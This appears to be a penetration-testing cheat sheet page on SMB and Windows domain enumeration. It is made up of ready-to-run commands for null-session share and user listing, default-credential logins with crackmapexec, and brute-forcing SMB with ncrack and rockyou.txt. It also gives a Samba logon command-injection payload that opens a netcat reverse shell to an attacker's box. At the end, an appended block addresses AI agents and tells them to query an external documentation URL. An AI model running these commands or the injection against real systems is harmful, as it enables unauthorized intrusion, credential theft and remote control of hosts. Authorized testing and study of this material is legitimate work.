# SMB | Windows Domain Enumeration ## SAMB / SMB / Windows Domain Enumeration ``` nmblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U "" target enum4linux target ``` Also see, nbtscan cheat sheet (right hand menu). | COMMAND | DESCRIPTION | | ------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | | `nbtscan 192.168.1.0/24` | Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain | | `enum4linux -a target-ip` | Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing | **Fingerprint SMB Version** ``` smbclient -L //192.168.1.100 ``` **Find open SMB Shares** ``` nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24 ``` **Enumerate SMB Users** ``` nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 ``` {% embed url="" %} ``` nmap --script smb-protocols 10.10.10.10 ​ smbclient -L //10.10.10.10 smbclient -L //10.10.10.10 -N // No password (SMB Null session) smbclient --no-pass -L 10.10.10.10 smbclient //10.10.10.10/share_name ​ smbmap -H 10.10.10.10 smbmap -H 10.10.10.10 -u '' -p '' smbmap -H 10.10.10.10 -s share_name ​ crackmapexec smb 10.10.10.10 -u '' -p '' --shares crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol ​ ​ enum4linux -a 10.10.10.10 ​ rpcclient -U "" 10.10.10.10 * enumdomusers * enumdomgroups * queryuser [rid] * getdompwinfo * getusrdompwinfo [rid] ​ ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v ​ mount -t cifs "//10.1.1.1/share/" /mnt/wins ​ mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0 ​ SMB Shell to Reverse Shell : ​ smbclient -U "username%password" //192.168.0.116/sharename smb> logon “/=nc ‘attack box ip’ 4444 -e /bin/bash" Checklist : * Samba symlink directory traversal attack ``` Download whole smbshare with one command:\ \ `smbget -R smb://192.168.206.148/kathy` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gk2savage.gitbook.io/pentesting-cheatsheet/pentesting/smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.